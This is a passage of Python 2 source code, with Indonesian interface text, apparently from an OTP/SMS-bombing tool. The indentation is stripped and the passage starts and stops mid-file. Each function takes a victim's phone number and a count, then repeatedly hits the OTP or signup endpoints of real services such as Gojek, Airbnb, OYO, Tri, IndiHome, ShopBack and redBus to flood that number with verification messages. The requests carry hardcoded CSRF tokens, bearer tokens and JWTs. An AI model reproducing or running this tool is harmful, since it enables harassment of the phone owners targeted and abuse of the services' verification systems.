hd = {'origin': 'https://www.airbnb.co.id', 'x-csrf-token': 'V4$.airbnb.co.id$pgPRrSWF_-4$VvFL20hLPGSifNfUZuQFk0hBSM2sFv7ptbLjEn1qEp0=', 'x-csrf-without-token': '1', 'user-agent': '{acak}', 'content-type': 'application/json', 'accept': 'application/json, text/javascript, */*; q=0.01', 'cache-control': 'no-cache', 'x-requested-with': 'XMLHttpRequest', 'referer': 'https://www.airbnb.co.id/signup_login', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
r = requests.Session()
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.post('https://www.airbnb.co.id/api/v2/phone_one_time_passwords?currency=USD&key=d306zoyjsyarp7ifhu67rjxn52tv0t20&locale=id', headers=hd, data=datajson)
if 'success' in a.text:
print '%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
time.sleep(10)
else:
print '%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
time.sleep(10)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
air()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def ald():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 08XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
ald()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
ald()
print
z = 0
for x in range(int(jml)):
try:
z += 1
a = requests.post('https://www.misteraladin.com/api/members/otp/request', data={'phone_number_country_code': '62', 'phone_number': no, 'type': 'register'})
if 'Coba lagi dalam 59 menit' in a.text:
print '%s[%s%s%s] %sLimit 1 jam, coba lagi nanti' % (W1, R1, z, W1, W0)
time.sleep(1)
else:
print '%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
time.sleep(10)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
ald()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def tri():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 089XX (khusus no three)\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
tri()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
tri()
print
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
head = {'Host': 'registrasi.tri.co.id', 'Connection': 'keep-alive', 'Content-Length': '59', 'Accept': 'application/json, text/javascript, */*; q=0.01', 'Origin': 'https://registrasi.tri.co.id', 'X-Requested-With': 'XMLHttpRequest', 'User-Agent': '{acak}', 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', 'Sec-Fetch-Site': 'same-origin', 'Sec-Fetch-Mode': 'cors', 'Referer': 'https://registrasi.tri.co.id/daftar', 'Accept-Encoding': 'gzip, deflate, br', 'Accept-Language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
z = 0
for x in range(int(jml)):
try:
z += 1
a = requests.post('https://registrasi.tri.co.id/daftar/generateOTP', headers=head, data={'token': 'rU19E0PpDABQ5CVY2g7uXx7dlr4L5UQx', 'msisdn': no})
if 'success' in a.text:
print '%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
time.sleep(10)
else:
print '%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
time.sleep(10)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
tri()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def oyo():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 8XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
oyo()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
oyo()
print
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
r = requests.Session()
hd = {'Host': 'www.oyorooms.com', 'xsrf-token': 'PyMZVXFT-wEDYO2Cl-2UYrh7FtvGLDywTnOI', 'user-agent': '{acak}', 'accept': '*/*', 'referer': 'https://www.oyorooms.com/login/?modal=signup', 'accept-encoding': 'gzip, deflate, br', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.get('https://www.oyorooms.com/api/pwa/generateotp?phone=' + no + '&country_code=%2B62&nod=4&locale=id', headers=hd)
if 'correct' in a.text:
print '%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
time.sleep(10)
else:
print '%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
time.sleep(10)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
oyo()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def coda():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 08XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
coda()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
coda()
print
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
head = {'Host': 'revan.mohona.tv', 'Connection': 'keep-alive', 'Content-Length': '18', 'Accept': '*/*', 'Origin': 'http://revan.mohona.tv', 'X-Requested-With': 'XMLHttpRequest', 'Save-Data': 'on', 'User-Agent': '{acak}', 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', 'Referer': 'http://revan.mohona.tv/', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7,ms;q=0.6,da;q=0.5,pt;q=0.4,jv;q=0.3'}
z = 0
for x in range(int(jml)):
try:
z += 1
a = requests.post('http://revan.mohona.tv/codapay2.php', headers=head, data={'target': no}).text
print '%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
time.sleep(1)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
coda()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def map():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 08XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
map()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
map()
print
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
data = {'phone': no}
datajson = json.dumps(data)
r = requests.Session()
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.post('https://cmsapi.mapclub.com/api/signup-otp', data=datajson, headers={'Host': 'cmsapi.mapclub.com', 'Connection': 'keep-alive', 'Content-Length': '23', 'Accept': 'application/json, text/plain, */*', 'Origin': 'https://www.mapclub.com', 'Save-Data': 'on', 'User-Agent': '{acak}', 'content-type': 'application/json', 'Referer': 'https://www.mapclub.com/id/user/signup', 'Accept-Encoding': 'gzip, deflate, br', 'Accept-Language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7,ms;q=0.6,da;q=0.5,pt;q=0.4,jv;q=0.3'})
if 'ok' in a.text:
print '%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
time.sleep(10)
else:
print '%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
time.sleep(10)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
map()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def gojek():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: +628XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
gojek()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
gojek()
print
hd = {'Accept': 'application/json', 'X-Platform': 'Android', 'X-UniqueId': 'd35889777f55fb15', 'X-AppVersion': '3.40.2', 'X-AppId': 'com.gojek.app', 'X-Session-ID': '2f62c15b-c2c8-4103-b9ee-fcb2e16f38b2', 'X-PhoneModel': 'samsung,SMJ111F', 'X-PushTokenType': 'FCM', 'X-DeviceOS': 'Android,5.1.1', 'User-uuid': '', 'X-DeviceToken': '', 'Authorization': 'Bearer', 'Accept-Language': 'id-ID', 'X-User-Locale': 'id_ID', 'Content-Type': 'application/json; charset=UTF-8', 'Content-Length': '101', 'Host': 'api.gojekapi.com', 'Connection': 'Keep-Alive', 'Accept-Encoding': 'gzip', 'User-Agent': 'okhttp/3.12.1'}
data = {'phone': no}
datajson = json.dumps(data)
r = requests.Session()
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.post('https://api.gojekapi.com/v4/customers/login_with_phone', headers=hd, data=datajson)
if '30 menit' in a.text:
print '%s[%s%s%s] %sLimit 30 menit, coba lagi nanti' % (W1, R1, z, W1, W0)
time.sleep(1)
else:
print '%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
time.sleep(10)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
gojek()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def rupa():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 08XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
rupa()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
rupa()
data = {'phone': no, 'action': 'register', 'channel': 'message', 'email': '', 'customer_id': '0', 'is_resend': '0'}
datajson = json.dumps(data)
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
hd = {'origin': 'https://m.ruparupa.com', 'authorization': 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1dWlkIjoiOWYyN2U2ODMtZmQ4My00MDQ0LWIzMDgtOTM1OWFhZTJlMDAyIiwiaWF0IjoxNTgzNjM5Mjg5LCJpc3MiOiJ3YXBpLnJ1cGFydXBhIn0.uIIXB3QCLDhDnFZ-9i90qtjicRXoRK6V622Dmfvnj1o', 'user-agent': '{acak}', 'content-type': 'application/json', 'accept': 'application/json', 'referer': 'https://m.ruparupa.com/verification?page=otp-choices', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
r = requests.Session()
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.post('https://wapi.ruparupa.com/auth/generate-otp', headers=hd, data=datajson)
if 'Kode verifikasi berhasil dikirimkan' in a.text:
print '\n%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
wait(30)
else:
print '\n%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
wait(30)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
rupa()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def idh():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 08XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
idh()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
idh()
print
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
hd = {'origin': 'https://sobat.indihome.co.id', 'x-requested-with': 'XMLHttpRequest', 'user-agent': '{acak}', 'content-type': 'application/x-www-form-urlencoded; charset=UTF-8', 'referer': 'https://sobat.indihome.co.id/register', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
r = requests.Session()
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.post('https://sobat.indihome.co.id/ajaxreg/msisdnGetOtp', headers=hd, data={'type': 'hp', 'msisdn': no})
if 'Kode verifikasi telah dikirim' in a.text:
print '\n%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
time.sleep(10)
else:
print '\n%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
time.sleep(10)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
idh()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def phd2():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 8XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
phd2()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
phd2()
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
hd = {'origin': 'https://www.phd.co.id', 'accept': 'application/json, text/javascript, */*; q=0.01', 'x-requested-with': 'XMLHttpRequest', 'user-agent': '{acak}', 'content-type': 'application/x-www-form-urlencoded; charset=UTF-8', 'referer': 'https://www.phd.co.id/en/users/createnewuser', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
r = requests.Session()
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.post('https://www.phd.co.id/en/users/createNewUser', headers=hd, data={'request_id': '', 'first_name': 'Yayak', 'last_name': 'Yk', 'gender': 'male', 'phone_number': no, 'birthday_d': '', 'birthday_m': '', 'birthday_y': '', 'birthday': '1999-03-01', 'username': 'yayakyk22@40gmail.com', 'password': 'Anjaymanar123$$', 'agreeterms': '1'})
if 'OK' in a.text:
print '\n%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
wait(30)
else:
print '\n%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
wait(30)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
phd2()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def spl():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 08XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
spl()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
spl()
print
data = {'phone_number': no}
datajson = json.dumps(data)
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
hd = {'accept': 'application/json, text/plain, */*', 'origin': 'https://m.sepulsa.com', 'authorization': 'bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJ3d3cuc2VwdWxzYS5jb20iLCJleHAiOjE1ODQzNTU3MzYsImlhdCI6MTU4Mzc1MDkzNiwic2NvcGUiOnsib3RwIjoicmVxdWVzdCJ9LCJqdGkiOiI2ZFdaMXJQU0tsMVAyVG16TTYxbDdtcmhuSlN1ei03MXJfVXN1Q1dIWDIwIiwiYXVkIjoiYmFnYXN0cmkzMkBnbWFpbC5jb20ifQ.La5TzFdePQg4vUEFfLfzII72u7_tHjd2mrOpG182BNb_8hfAzq1uPIVkpZhg141xVmbNT3SchjE6hSyU8RVPI4lceXGwMELzYsnXYDAbn3Z7GyZP90ZiEFwBIzWD66VHz0ALJRwX7mkuAGaZkVJlcqQEkOjqk4lpJsrtZouQt4xrVqibfJCkWrTYNaFbbw9WdKZNTmowdyOyZQ4JqawNDG59KjzgmwjwWeR8c79rBUDqQY9lDMkGEQR_TBBl3JP2xGpyTlUTy-IDTeP-Ini2ybyTinycbnbcqJoPqbN6pz5jR5WSowRLH7cqb16rv1rqE6aP1Bza_TjoGRFnWw5gtA', 'source': "frigate'", 'user-agent': 'Mozilla/5.0 (Linux; Android 5.1.1; SM-J111F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.90 Mobile Safari/537.36', 'content-type': 'application/json', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
r = requests.Session()
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.post('https://gaia.sepulsa.com/bumi/otp/request', headers=hd, data=datajson).text
print a
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
spl()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def red():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 8XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
red()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
red()
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
hd = {'accept': 'application/json, text/javascript, */*; q=0.01', 'user-agent': '{acak}', 'referer': 'https://m.redbus.id/en/', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
r = requests.Session()
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.get('https://m.redbus.id/api/getOtp?number=' + no + '&cc=62&whatsAppOpted=false', headers=hd)
if 'OTP Sent Successfully' in a.text:
print '\n%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
wait(30)
else:
print '\n%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
wait(30)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
red()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def shp():
logo()
r = requests.Session()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: +628XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
shp()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
shp()
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.get('https://www.shopback.co.id/login?redirect=/referral/invite#', headers={'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7', 'cache-control': 'max-age=0', 'sec-fetch-mode': 'navigate', 'sec-fetch-site': 'none', 'sec-fetch-user': '?1', 'upgrade-insecure-requests': '1', 'user-agent': '{acak}'}).text
b = bs(a, 'html.parser')
c = b.find('input', attrs={'type': 'hidden', 'name': 'nice_try_token'})
d = r.post('https://www.shopback.co.id/account/sendOtp', headers={'accept': 'application/json', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7', 'content-length': '115', 'content-type': 'application/x-www-form-urlencoded', 'http_x_requested_with': 'XMLHttpRequest', 'origin': 'https://www.shopback.co.id', 'referer': 'https://www.shopback.co.id/login?redirect=/referral/invite', 'sec-fetch-mode': 'cors', 'sec-fetch-site': 'same-origin', 'user-agent': '{acak}', 'x-requested-with': 'XMLHttpRequest'}, data={'phone': no, 'nice_try_token': c['value'], 'email': 'akasaka1@etlgr.com', 'target': 'signup'}).text
if d == '{"verified":false}':
print '\n%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
wait(30)
else:
print '\n%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
wait(30)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
shp()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def pmn():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 08XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
pmn()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
pmn()
print
data = {'operationName': 'LoginByPhone', 'variables': {'input': {'country_code': '+62', 'phone_number': no, 'platform': 'web'}}, 'query': 'mutation LoginByPhone($input: LoginByPhoneInput) {\n LoginByPhone(input: $input) {\n token\n __typename\n }\n}\n'}
datajson = json.dumps(data)
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
hd = {'content-length': '256', 'device-type': 'mobile-web', 'origin': 'https://web.pomona.id', 'source': 'mobile-web', 'user-agent': '{acak}', 'content-type': 'application/json', 'accept': '*/*', 'ip': '114.142.170.30', 'referer': 'https://web.pomona.id/masuk', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
r = requests.Session()
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.post('https://api.pomona.id/graphql', headers=hd, data=datajson)
if '"token":null,"' in a.text:
print '%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
time.sleep(10)
else:
print '%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
time.sleep(10)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
pmn()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def jet():
logo()
print '%s[%s#%s] %sWork jika nomor korban blom daftar JET' % (G1, Y1, G1, W0)
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 08XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
jet()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
jet()
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
hd = {'Connection': 'keep-alive', 'Content-Length': '127', 'Accept': '*/*', 'Origin': 'http://jet.id', 'X-Requested-With': 'XMLHttpRequest', 'Save-Data': 'on', 'User-Agent': '{acak}', 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', 'Referer': 'http://jet.id/Account/Register', 'Accept-Language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
r = requests.Session()
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.post('http://jet.id/Account/register', headers=hd, data={'fullName': 'Yayakyk', 'email': 'yayakyk@40gmail.com', 'phoneNumber': no, 'address': 'Jakarta', 'password': 'qwerty123', 'confirmPassword': 'qwerty123'}).text
print a
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
jet()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def tw():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 08XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
tw()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
tw()
print
